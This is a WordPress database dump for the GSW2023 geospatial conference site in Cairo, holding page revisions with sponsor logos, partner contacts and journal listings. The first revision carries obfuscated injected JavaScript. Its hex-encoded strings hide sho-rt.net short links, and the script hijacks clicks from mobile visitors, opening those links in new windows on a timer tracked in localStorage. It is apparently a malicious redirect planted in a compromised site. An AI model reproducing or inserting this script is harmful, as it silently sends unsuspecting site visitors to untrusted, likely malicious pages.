_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:57:38','2023-08-16 02:57:38','',3066,'https://gsw2023.com/?p=5275',0,'revision','',0),
(5276,1,'2023-08-16 02:57:57','2023-08-16 02:57:57','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692154570478{margin-top: 75px !important;}\"]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 18pt;\"><strong>Prime Minister of the </strong></span><span style=\"font-size: 18pt;\"><strong>Arab Republic of Egypt</strong></span></h6>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" 